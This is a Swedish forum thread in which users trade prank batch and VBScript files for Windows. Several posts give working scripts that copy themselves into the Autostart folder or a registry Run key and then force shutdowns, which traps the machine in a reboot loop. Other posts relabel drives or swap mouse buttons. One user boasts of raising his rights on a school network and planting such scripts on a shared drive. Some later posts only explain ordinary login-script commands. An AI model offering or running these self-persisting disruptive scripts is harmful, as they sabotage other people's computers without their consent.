Jävulskap & annat kul med .cmd/.bat filer

Permalänk
Medlem

jag testa din kod power men fick den tyvärr inte att fungera. Jag är nyböjare på detta ämne så jag vet inte vad som var felet men hur som helst så skrev jag om den till en lite "snällare" variant.

Set cmd = CreateObject("WScript.Shell")
If MsgBox ("Jag svettas, det är för varmt, du borde stänga av mig! Stäng av mig?", 4 , "Heeet, så het...") = 6 Then
cmd.Run "c:\"
End If

och den funka fint

Permalänk
Medlem

Ok, dessa fungerade med lite modifikationer så det blev

Set cmd = CreateObject("WScript.Shell") While(true) If MsgBox ("Jag svettas, det är för varmt, du borde stänga av mig! Stäng av mig?", 4, "Heeet, så het...") = 6 Then cmd.Run "shutdown -s -t 00",0,true End If Wscript.sleep(60000) Wend

men hur får man en vbs fil att bli autostart?

Visa signatur

Citera så hittar jag tillbaks och kan ge svar.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av olol
Ok, dessa fungerade med lite modifikationer så det blev

Set cmd = CreateObject("WScript.Shell") While(true) If MsgBox ("Jag svettas, det är för varmt, du borde stänga av mig! Stäng av mig?", 4, "Heeet, så het...") = 6 Then cmd.Run "shutdown -s -t 00",0,true End If Wscript.sleep(60000) Wend

men hur får man en vbs fil att bli autostart?

Lägger till den i autostart mappen? Eller menar du att den lägger dit sig själv?

Permalänk
Medlem

av sig själv.. vet hur man gör med bat filer men inte med vbs..

Visa signatur

Citera så hittar jag tillbaks och kan ge svar.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av olol
av sig själv.. vet hur man gör med bat filer men inte med vbs..

Är lite nyfiken på hur man gör en bat fil som lägger sig själv i autostart, kan någon säga?

lite OffT kanske...

Permalänk
Medlem

Jag kan säga det...

COPY C: "namn.bat" C:\Documents and Settings\All Users\Start-meny\Program\Autostart

detta gör så att i xp på svenska så kommer filen till autostart om den är på C när den startas.. annars kan du skriva

COPY C: "namn.bat" C:\Documents and Settings\All Users\Start-meny\Program\Autostart COPY E: "namn.bat" C:\Documents and Settings\All Users\Start-meny\Program\Autostart COPY D: "namn.bat" C:\Documents and Settings\All Users\Start-meny\Program\Autostart

så spelar det igen roll om den är på C D eller E den kommer till autostart iaf..

Visa signatur

Citera så hittar jag tillbaks och kan ge svar.

Permalänk
Medlem

storande.bat

shutdown -s -t 5 -c "YoU gOt A VirUZzzZz" move "storande.bat" "C:\Documents and Settings\All Users\Start-meny\Program\Autostart\"

roligt skript. Gör att datorn startar och stängs av.. Felsäkert läget är behövs!

Visa signatur

Burk 1: MSI Neo4 Platinum, AMD64 "Winchester" 3200+ , Corsair 2048mb, 7800GT.
Burk 2: AMD64 "Venice" 3200+ @ 2500mhz, AsRock SATA2, Corsair 2048mb, XFX 6800GT NV5 Silencer.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av CreV-
Felsäkert läget är behövs!

eller så kan man ju hålla inne shift medan windows laddar...

Visa signatur

"Sleep is one of those funny things about being a human being" - Marshall Brain
"Mike broke the hubble, Mike broke the hubble" - Mystery Science Theater 3000
"Det finns inget som kan kallas skrot!" säger Mulle Meck, "bara gamla saker som går att använda på nya sätt. Rulla ut och rulla på."

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Power
eller så kan man ju hålla inne shift medan windows laddar...

Haha. Det visste jag inte.

Men för nybörjare är detta ett skript som leder till formatering

Visa signatur

Burk 1: MSI Neo4 Platinum, AMD64 "Winchester" 3200+ , Corsair 2048mb, 7800GT.
Burk 2: AMD64 "Venice" 3200+ @ 2500mhz, AsRock SATA2, Corsair 2048mb, XFX 6800GT NV5 Silencer.

Permalänk
Medlem

haha.. raden:

move "storande.bat" "C:\Documents and Settings\All Users\Start-meny\Program\Autostart\"

var ganska bra, viste inte att man kunde ha bara move "storande.bat" men om du tar copy blir det roligare, då blir ju orginalet kvar och han tar bort det, så! en restart så e d slut sen tänker han, mn det fortsätter.. ganska kul.. så mitt förslag är

copy "storande.bat" "C:\Documents and Settings\All Users\Start-meny\Program\Autostart\" Shutdown -s -t 60 -c "Du har virus för tusan, det blir problem nu..." label c: "p0rn" label d: "Mera p0rn" label e "Mest p0rn"

//olol

Visa signatur

Citera så hittar jag tillbaks och kan ge svar.

Permalänk
Medlem

copy "%~0" %ALLUSERSPROFILE%\Autostart

borde kopiera .cmd/.bat filen, oavsett vad den heter och vart den ligger, till autostart mappen

Visa signatur

"Sleep is one of those funny things about being a human being" - Marshall Brain
"Mike broke the hubble, Mike broke the hubble" - Mystery Science Theater 3000
"Det finns inget som kan kallas skrot!" säger Mulle Meck, "bara gamla saker som går att använda på nya sätt. Rulla ut och rulla på."

Permalänk
Medlem

Har ni tänkt på en sak?

Ett skript som "förstör" är som ett virus som är oaktivt.

Tex:

Du skickar batfilen till en polare som skickar den vidare och vidare. Till slut så startar nån filen och då har batfilen redan spritt sig som ett "vanligt" virus.

Och jag e riktigt nybörjare inom dator hack och lack.

Det är andra skriptet jag gjorde ^^

Visa signatur

Burk 1: MSI Neo4 Platinum, AMD64 "Winchester" 3200+ , Corsair 2048mb, 7800GT.
Burk 2: AMD64 "Venice" 3200+ @ 2500mhz, AsRock SATA2, Corsair 2048mb, XFX 6800GT NV5 Silencer.

Permalänk

tjenare.
nu har jag läst igenom hela den här tråden och tagit vara på 18st script. som jag har sparat i txt-format.

nu har jag än liten "request"...
jag söker efter någon som har lust att kolla igen de scripten jag har och sedan skriva en kort sammanfattning om vad varje script gör och hur man stoppar dem (om det går) då det inte alltid står
jag vet att det låter tråkigt att hjälpa mig med det men jag skulle uppskatta det VÄLDIGT mycket... speciellt med tanke på att jag inte är så hajj på detta än

TACK PÅ FÖRHAND
//Robban

Visa signatur

All the same, take me away.
We're Dead to the World

Permalänk

Vad man än ska göra så borde man ha med:

Kopierar filen till en mapp i windows mappen:
"copy FILNAMN.xxx %systemroot%\system32\FILNAMN.xxx"

Tar bort filen som först kördes och den som just kopierats
"del FILNAMN.xxx"
"del FILNAMN2.xxx"

och lägga till en autostart via registret:

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v FILNAMN /t REG_SZ /d %systemroot%\system32\FILNAMN.xxx

och sen givetvis starta filen:
start %systemroot%\system32\FILNAMN

Det är ett tips som passar alla möjliga skämt.

En rolig grej om man är på LAN är att köra det här:

"sc config messenger start= auto"
"net start messenger"

Det gör så att tjänsten messenger startas. Då kan man skriva meddelanden till sin kompis via CMD.

Det här vet jag inte om det fungerar till alla versoner av windows, men det är roligt för dem det fungerar på iaf:

"rundll32.exe user32.dll,SwapMouseButton"
Det byter alltså vänster musknapp mot höger

Allt som jag skrivit fungerar i .bat filer. I t.ex. .vbs kan det vara andra kommandon.

Visa signatur

| i5 10600k@4,7 Ghz | AMD 6800 | 4Ghz RAM | 1 TB m.2 |

Permalänk

en kul grej är:

@echo off
cls
:lol
rundll32 user32,SetCursorPos
goto lol

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av olol
Jag kan säga det...

COPY C: "namn.bat" C:\Documents and Settings\All Users\Start-meny\Program\Autostart

detta gör så att i xp på svenska så kommer filen till autostart om den är på C när den startas.. annars kan du skriva

COPY C: "namn.bat" C:\Documents and Settings\All Users\Start-meny\Program\Autostart COPY E: "namn.bat" C:\Documents and Settings\All Users\Start-meny\Program\Autostart COPY D: "namn.bat" C:\Documents and Settings\All Users\Start-meny\Program\Autostart

så spelar det igen roll om den är på C D eller E den kommer till autostart iaf..

eller så använder du dej av systemvariablarna som finns

%ALLUSERSPROFILE%

så kan du skala ner din kod till en rad istället för tre

Visa signatur

.: Learn the system, Play the system, Break the system :.

Permalänk
Medlem
Citat:

"rundll32.exe user32.dll,SwapMouseButton"
Det byter alltså vänster musknapp mot höger

Haha XD

Permalänk
Medlem

Hej jag har en fråga jag och en kompis brukar sitta bredvid varandra under de lektioner när vi använder dator, kan man göra nåt från cmd på min dator så att nåt händer med hans dator typ att cd luckan åker ut ir nåt medelande kommer upp eller nåt jag vet inte... har inte tänkt att hela nätverket ska få nåt meddelande men bara nåt på hans dator och ip på den dator han sitter på kan man jag ju fråga han om, Altså vi sitter i en sal med kanske 20 datorer.. skulle va kul att göra nåt, han skulle tro att man e värsta haxxor ^^

Visa signatur
Permalänk
Citat:

Ursprungligen inskrivet av dennis93
Hej jag har en fråga jag och en kompis brukar sitta bredvid varandra under de lektioner när vi använder dator, kan man göra nåt från cmd på min dator så att nåt händer med hans dator typ att cd luckan åker ut ir nåt medelande kommer upp eller nåt jag vet inte... har inte tänkt att hela nätverket ska få nåt meddelande men bara nåt på hans dator och ip på den dator han sitter på kan man jag ju fråga han om, Altså vi sitter i en sal med kanske 20 datorer.. skulle va kul att göra nåt, han skulle tro att man e värsta haxxor ^^

Om du läser tråden kommer du få svar på dedär.

Visa signatur

[X2 4200+@2700mhz][X1900XTX][580W Type-R][Lexa][OCZ Golden 2048 Mb][a8r-mvp]
Canon 30D - Canon 50/1:1.8 II - Canon 70-200/4.0 L

Permalänk

Aha, är det någon som kan förklara dessa vanliga batch kommandon?

detta är skolans inloggningsknapp:

@echo off rem inloggnings script set uname=%1 if "x%uname%"=="x" (set /P uname=Anv„ndarnamn:) NET USE H: \\Server1\%uname%$ * /USER:elever\%uname% NET USE L: \\Server1\Lag$ NET USE P: \\Server1\Serverprogram$ :end

Vad är tillexempel "rem" saken där uppe?
och vad gör den speciella "if"?
Och så är det något innomparentes dära åxå; "Set /P" ?
dendäre första NET USE ser speciell ut, vad händer där?

och är :end nödvändigt verkligen?
och att ha mellanrum mellan varje rad, är det oclså növdändigt värkligen då alltså?

Någon som kan utbilda oss frivilligt eller om någon vet någon bra sida?

Visa signatur

PC: Windows 10 Pro x64 | ASUS Z270 ROG MAXIMUS IX CODE | Intel i7 7700K 4.2 GHz | Crucial 2x8GB@2400MHz | ASUS GeForce GTX 1070 8GB DUAL OC | Samsung 960 EVO 500GB | WD Red 2TB | Corsair TX650M 650W | Deepcool Tesseract ATX

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av -8-DEAMON-8-

@echo off // stänger av så att inte en viss utdata visas, vet inte hur man ska förklara det på ett bra sätt rem inloggnings script // detta är en kommentar set uname=%1 // sätter en variabel till det argument som scriptet startades med, t.ex. "script.bat hej" sätter uname till hej if "x%uname%"=="x" (set /P uname=Anv„ndarnamn:) // om det inte finns något användar namn så får man skriva in ett själv, set /p variabel= gör så att man själv från consolen kan skriva in ett värde // lägger till några nätverks enheter kopplade till användaren NET USE H: \\Server1\%uname%$ * /USER:elever\%uname% NET USE L: \\Server1\Lag$ NET USE P: \\Server1\Serverprogram$ // helt onödig, men kan användas om man har ett goto eller call någonstans :end

inte världens bästa förklaring kanske, men jag hoppas du förstår

Visa signatur

"Sleep is one of those funny things about being a human being" - Marshall Brain
"Mike broke the hubble, Mike broke the hubble" - Mystery Science Theater 3000
"Det finns inget som kan kallas skrot!" säger Mulle Meck, "bara gamla saker som går att använda på nya sätt. Rulla ut och rulla på."

Permalänk
Citat:

Ursprungligen inskrivet av -8-DEAMON-8-

Text...

Testa "help" i DOS-prompten.

C:\>help rem C:\>help if C:\>help set

etc.

Där finns all info du behöver.

Permalänk
Medlem

Hehehe, jag har ändrat min inloggning på skolans nätverk från begränsad till lokal administratör, hehe.

Har lagt ut en massa elaka skript i en mapp vid namn GRYMT KUL på den gemensamma hdd'n på servern också.

Lite ny vid det här, kan man ändra ikon på en .VBs fil utan visual basic lr liknande program.

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av str8forthakill
Hehehe, jag har ändrat min inloggning på skolans nätverk från begränsad till lokal administratör, hehe.

Hur gjorde du det?

Visa signatur

Phenom II X6 1055t @ 3,5GHz
Sleeva.se »

Permalänk
Citat:

Ursprungligen inskrivet av dotar

@echo off color 0A cd C:\WINNT\system32 :LOOP dir GOTO LOOP

Lägg i autostart eller nåt.. Kanske inte så djävulskt, men kanske lite irriterande (Byt ut WINNT mot windows-mappen..)

aha, den var superku!!
Hmm, hur programmerar man den så att den startar i stort fönster och så att den startar 3 likadana brevid varandra? Hur? skriver man något med "high: 170" m.m. ? och "start 3 of matrix.bat" ? Hmm, hur är det egentligen?
iallafall Då blir det som The Matrix på skärmen !! WWOWOWW!!

Visa signatur

PC: Windows 10 Pro x64 | ASUS Z270 ROG MAXIMUS IX CODE | Intel i7 7700K 4.2 GHz | Crucial 2x8GB@2400MHz | ASUS GeForce GTX 1070 8GB DUAL OC | Samsung 960 EVO 500GB | WD Red 2TB | Corsair TX650M 650W | Deepcool Tesseract ATX

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av Soulnut
Hur gjorde du det?

Sånt ska inte diskuteras i detta forum!
Hacking är olagligt och det lär jag inte ut!

Permalänk

hallå, jag laddade ner Notepad++. DEt var jätte kul!
Finns det andra liknade program?
för på dendära notepad++ fanns det batchkodning så den lägger en färg på vissa ord osv.
Finns det andra bättre program som kodar batch om nånn vet något?

Visa signatur

PC: Windows 10 Pro x64 | ASUS Z270 ROG MAXIMUS IX CODE | Intel i7 7700K 4.2 GHz | Crucial 2x8GB@2400MHz | ASUS GeForce GTX 1070 8GB DUAL OC | Samsung 960 EVO 500GB | WD Red 2TB | Corsair TX650M 650W | Deepcool Tesseract ATX

Permalänk
Medlem
Citat:

Ursprungligen inskrivet av -8-DEAMON-8-
hallå, jag laddade ner Notepad++. DEt var jätte kul!
Finns det andra liknade program?
för på dendära notepad++ fanns det batchkodning så den lägger en färg på vissa ord osv.
Finns det andra bättre program som kodar batch om nånn vet något?

Vet inte om den är bättre men det finns något som heter Notepad2 som verkar uppskattat (jag vet inte, kör bra med notepad++).

Visa signatur

Desktop|i5 3570k(@4,4GHz)|Asus P8Z77-V|AMD 6950|12GB RAM|Crucial BX500 480GB|Manjaro|
Laptop|Lenovo T440s|i7|8GB RAM|Debian Jessie|
Server|Fujitsu Primergy TX1310|G1820|8GB RAM|15TB|Unraid|
Ring, lånad mail

Permalänk
Medlem

SciTE är också bra.

Permalänk
Medlem

Det har ju tagits upp hur man ändrar right/left knapp på musen...

Går det att ändra reverse med åt vilket håll man drar åt? Och hastighet?

Skulle det gå att göra en vbs fil som slumpmässigt ändrar vilken axel som är Y och X så plötsligt när man drar åt höger åker den upp/ner/vänster ?:P